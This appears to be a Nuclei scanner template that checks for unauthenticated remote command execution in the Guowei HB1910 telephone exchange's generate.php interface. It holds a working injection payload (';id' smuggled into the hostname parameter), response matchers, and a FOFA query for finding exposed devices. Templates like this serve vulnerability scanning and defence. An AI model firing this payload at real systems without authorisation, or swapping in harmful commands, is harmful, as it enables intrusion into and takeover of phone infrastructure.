http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
            - groups=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "GET /modules/ping/generate.php?send=Ping&hostname=;id HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive     \n"
id: HB1910-generate_php-RCE
info:
    author: Superhero
    description: |-
        fofa: body="themes/tenant/css/login.css"
        国威HB1910数字程控电话交换机 generate.php 接口存在远程命令执行漏洞，未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令，写入webshell后门文件，获取服务器权限。
    name: 国威HB1910数字程控电话交换机 generate.php 未授权RCE漏洞
    reference:
        - https://mp.weixin.qq.com/s/cjFFg5nsX3bJpp9au9-m3g?token=1383368913&lang=zh_CN
    severity: high
    tags: []
